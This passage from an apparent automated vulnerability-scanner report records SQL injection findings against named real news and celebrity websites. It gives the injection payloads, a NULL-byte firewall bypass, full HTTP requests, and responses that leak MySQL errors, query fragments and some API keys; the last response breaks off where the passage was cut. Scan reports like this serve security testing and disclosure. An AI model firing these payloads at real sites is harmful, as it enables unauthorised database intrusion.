1.23. http://www.nbcmiami.com/news/local-beat/UM-Study-Says-Energy-Drinks-Pose-Serious-Risk-to-Kids-116150794.html [dr parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nbcmiami.com
Path:   /news/local-beat/UM-Study-Says-Energy-Drinks-Pose-Serious-Risk-to-Kids-116150794.html

Issue detail

The dr parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the dr parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local-beat/UM-Study-Says-Energy-Drinks-Pose-Serious-Risk-to-Kids-116150794.html?dr'%20and%201%3d1--%20 HTTP/1.1
Host: www.nbcmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u38-b4
Content-Type: text/html;charset=utf-8
Date: Mon, 14 Feb 2011 20:15:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 261120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraph.org/s
...[SNIP]...
n: "http://media.nbcmiami.com", submissionType: "", momentCategory: "", debug: false, roadblockOrdNumber: 781542667,
defaultLat: "25.78", defaultLong: "-80.21", gmapKey: "ABQIAAAAqVLuG7bZfizR7HmRA5SLvRQugu4gdpSZOxJFlwts4RwSscqdyBSfI5FAWeznvqELjdqRqTblT3QkdA", fbApiKey: "7f779fdbd67c391510ced3838d966baf" };

</script>



<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="imagetoolbar" content="false" />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="google-site-verification" content="J_TExBQP8zWCS59RsGcM6VSRGvK0WA0HSmT5E7ZDWSs" />




















<title>




UM Study Says Energy Drinks Pose Serious Risk to Kids |
NBC Miami
</title>

<meta name="description" content="Industry disputes Miami School of Medicine's findings." />

<meta name="title" content="UM Study Says Energy Drinks Pose Serious Risk to Kids" />
<link rel="image_src" href="http://media.nbcmiami.com/images/107*75/092308-Energy-Drinks-p1.jpg" />





<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc.css?r=2011-01-11" type="text/css" />






<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc_story.css?r=2011-02-03" type="text/css" />



<link rel="stylesheet" href="http://www.nbcmiami.com/templates/jqmodal2.css?r=2011-02-03" type="text/css" />








<script src="http://www.nbcmiami.com/includes/utils.js?r=2011-02-03" language="javascript" type="text/javascript"></script>



<script src="http://www.nbcmiami.com/includes/nbc_jquery.js" language="javascript" type="text/javascript"></script>



<script src="http:/
...[SNIP]...

Request 2

GET /news/local-beat/UM-Study-Says-Energy-Drinks-Pose-Serious-Risk-to-Kids-116150794.html?dr'%20and%201%3d2--%20 HTTP/1.1
Host: www.nbcmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u38-b4
Content-Type: text/html;charset=utf-8
Date: Mon, 14 Feb 2011 20:15:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 261110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraph.org/s
...[SNIP]...
n: "http://media.nbcmiami.com", submissionType: "", momentCategory: "", debug: false, roadblockOrdNumber: 591917874,
defaultLat: "25.78", defaultLong: "-80.21", gmapKey: "ABQIAAAAqVLuG7bZfizR7HmRA5SLvRQugu4gdpSZOxJFlwts4RwSscqdyBSfI5FAWeznvqELjdqRqTblT3QkdA", fbApiKey: "7f779fdbd67c391510ced3838d966baf" };

</script>



<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="imagetoolbar" content="false" />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="google-site-verification" content="J_TExBQP8zWCS59RsGcM6VSRGvK0WA0HSmT5E7ZDWSs" />




















<title>




UM Study Says Energy Drinks Pose Serious Risk to Kids |
NBC Miami
</title>

<meta name="description" content="Industry disputes Miami School of Medicine's findings." />

<meta name="title" content="UM Study Says Energy Drinks Pose Serious Risk to Kids" />
<link rel="image_src" href="http://media.nbcmiami.com/images/107*75/092308-Energy-Drinks-p1.jpg" />





<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc.css?r=2011-01-11" type="text/css" />






<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc_story.css?r=2011-02-03" type="text/css" />



<link rel="stylesheet" href="http://www.nbcmiami.com/templates/jqmodal2.css?r=2011-02-03" type="text/css" />








<script src="http://www.nbcmiami.com/includes/utils.js?r=2011-02-03" language="javascript" type="text/javascript"></script>



<script src="http://www.nbcmiami.com/includes/nbc_jquery.js" language="javascript" type="text/javascript"></script>



<script src="http:/
...[SNIP]...

1.24. http://www.rollingstone.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=1800
Date: Mon, 14 Feb 2011 20:02:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/rstone.site/homepage;tile=1;dcopt=ist;sz=950x30;ord=0677163973?" type="text/javascript"><\/script>');
       tile = tile + 1;
   </script>
</div>                


                   <div id="main" class="">
<h1 class="hidden">Rollingstone Homepage - Music News, Reviews and Culture</h1>
<div id="col1">
<div id="col1_content" class="clearfix">
<div class="moduleContainer diagonalBackground newsContainer latestNews">
<a href="/news">
   <h2>Latest News</h2>
   </a>
<div class="diagonalContent">
<span class="dateTime">4 hours, 22 minutes ago</span>
<p class="newsMainDek"><a href="/music/news/arcade-fire-lady-antebellum-lady-gaga-win-big-at-the-grammys-20110214">Arcade Fire, Lady Antebellum, Lady Gaga Win Big at the Grammys</a></p>
<p class="newsSubDek"><a href="/music/news/arcade-fire-lady-antebellum-lady-gaga-win-big-at-the-grammys-20110214">Plus: Watch some of the best performances of the night, including Bob Dylan, Mick Jagger and Cee Lo Green</a></p>
<img src="http://assets.rollingstone.com/images/fe/layout/horizontalNarrowDivider.gif" width="202" height="4" /><br />



<span class="dateTime">3 hours, 34 minutes ago</span>
<p><a href="/music/news/the-unstoppable-ambition-of-arcade-fire-20110214">The Unstoppable Ambition of Arcade Fire</a></p>

<img src="http://assets.rollingstone.com/images/fe/layout/horizontalNarrowDivider.gif" width="202" height="4" /><br />


<span class="dateTime">3 hours, 42 minutes ago</span>
<p><a href="/music/news/warner-music-group-celebrates-at-exclusive-grammy-after-party-20110214">Warner Music Group Celebrates at Exclusive Grammy After-Party</a></p>

<img src="http://assets.rollingstone.com
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=1795
Date: Mon, 14 Feb 2011 20:02:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/rstone.site/homepage;tile=1;dcopt=ist;sz=950x30;ord=0320202215?" type="text/javascript"><\/script>');
       tile = tile + 1;
   </script>
</div>                


                   <div id="main" class="">
<h1 class="hidden">Rollingstone Homepage - Music News, Reviews and Culture</h1>
<div id="col1">
<div id="col1_content" class="clearfix">
<div class="moduleContainer diagonalBackground newsContainer latestNews">
<a href="/news">
   <h2>Latest News</h2>
   </a>
<div class="diagonalContent">
<span class="dateTime">4 hours, 22 minutes ago</span>
<p class="newsMainDek"><a href="/music/news/arcade-fire-lady-antebellum-lady-gaga-win-big-at-the-grammys-20110214">Arcade Fire, Lady Antebellum, Lady Gaga Win Big at the Grammys</a></p>
<p class="newsSubDek"><a href="/music/news/arcade-fire-lady-antebellum-lady-gaga-win-big-at-the-grammys-20110214">Plus: Watch some of the best performances of the night, including Bob Dylan, Mick Jagger and Cee Lo Green</a></p>
<img src="http://assets.rollingstone.com/images/fe/layout/horizontalNarrowDivider.gif" width="202" height="4" /><br />



<span class="dateTime">3 hours, 34 minutes ago</span>
<p><a href="/music/news/the-unstoppable-ambition-of-arcade-fire-20110214">The Unstoppable Ambition of Arcade Fire</a></p>

<img src="http://assets.rollingstone.com/images/fe/layout/horizontalNarrowDivider.gif" width="202" height="4" /><br />


<span class="dateTime">3 hours, 42 minutes ago</span>
<p><a href="/music/news/warner-music-group-celebrates-at-exclusive-grammy-after-party-20110214">Warner Music Group Celebrates at Exclusive Grammy After-Party</a></p>

<img src="http://assets.rollingstone.com
...[SNIP]...

1.25. http://www.sky.com/skynews/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sky.com
Path:   /skynews/home

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /skynews/home%00' HTTP/1.1
Host: www.sky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Last-Modified: Wed, 01 Dec 2010 10:51:19 GMT
ETag: "613e-add8-15ce37c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 44504
Date: Mon, 14 Feb 2011 20:02:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="js-on" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>


<
...[SNIP]...
<link type="text/css" href="/errors/404error_files/skycom_grid_f_tools_indent.css" rel="stylesheet">
...[SNIP]...

Request 2

GET /skynews/home%00'' HTTP/1.1
Host: www.sky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
X-N: S
Date: Mon, 14 Feb 2011 20:02:23 GMT
Content-Length: 210
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /skynews/home was not found on this server.</p>
</bod
...[SNIP]...

1.26. http://www.thedailybeast.com/author/howard-kurtz/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /author/howard-kurtz/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 13776228'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /author/howard-kurtz13776228'%20or%201%3d1--%20/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 20:02:43 GMT
Content-Length: 10432
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- SELECT t1.name from tags t1, tags_to_items tti
                    WHERE tti.items_id =
                    AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7' at line 3 -->
...[SNIP]...

1.27. http://www.thedailybeast.com/author/lloyd-grove [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /author/lloyd-grove

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 17752560'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /author/lloyd-grove17752560'%20or%201%3d1--%20 HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1297714276.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; __qca=P0-1634537195-1297715390784; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACC856051D1158-6000014140775629[CE]; __utma=157974911.1591606239.1297714276.1297714276.1297714276.1; __utmc=157974911; __utmb=157974911.3.10.1297714276

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 20:33:10 GMT
Connection: close
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- SELECT t1.name from tags t1, tags_to_items tti
                    WHERE tti.items_id =
                    AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7' at line 3 -->
...[SNIP]...

1.28. http://www.thedailybeast.com/author/lloyd-grove/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /author/lloyd-grove/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 12476951'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /author/lloyd-grove12476951'%20or%201%3d1--%20/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 20:02:56 GMT
Content-Length: 10431
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- SELECT t1.name from tags t1, tags_to_items tti
                    WHERE tti.items_id =
                    AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7' at line 3 -->
...[SNIP]...

1.29. http://x17online.com/celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://x17online.com
Path:   /celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /celebrities'/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php HTTP/1.1
Host: x17online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:05:06 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1859

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or fileinfo_url = '/celebrities'/sean_penn/sean_penn_throws_a_hissy_fit_at_lax' at line 5</font>
...[SNIP]...

Request 2

GET /celebrities''/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php HTTP/1.1
Host: x17online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:05:07 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

1.30. http://x17online.com/celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://x17online.com
Path:   /celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /celebrities/sean_penn'/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php HTTP/1.1
Host: x17online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:05:08 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1859

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or fileinfo_url = '/celebrities/sean_penn'/sean_penn_throws_a_hissy_fit_at_lax' at line 5</font>
...[SNIP]...

Request 2

GET /celebrities/sean_penn''/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php HTTP/1.1
Host: x17online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:05:08 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

1.31. http://x17online.com/celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://x17online.com
Path:   /celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php' HTTP/1.1
Host: x17online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:05:09 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1859

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/celebrities/sean_penn/sean_penn_throws_a_hissy_fit_' at line 5</font>
...[SNIP]...

Request 2

GET /celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php'' HTTP/1.1
Host: x17online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:05:09 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

1.32. http://x17online.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://x17online.com
Path:   /css/main.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /css'/main.css?8313 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: x17online.com

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:11:06 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1786

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or fileinfo_url = '/css'/main.css/') or (fileinfo_url like '/css'/main.css/ind' at line 5</font>
...[SNIP]...

1.33. http://x17online.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://x17online.com
Path:   /css/main.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /css/main.css'?8313 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: x17online.com

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:11:08 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1786

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/css/main.css'/index%'))
and blo' at line 5</font>
...[SNIP]...

1.34. http://x17online.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://x17online.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: x17online.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:08:48 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1785

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/favicon.ico'/index%'))
and blog' at line 5</font>
...[SNIP]...

1.35. http://x17online.com/js/common.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://x17online.com
Path:   /js/common.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /js'/common.js?3121 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: x17online.com

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:13:13 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
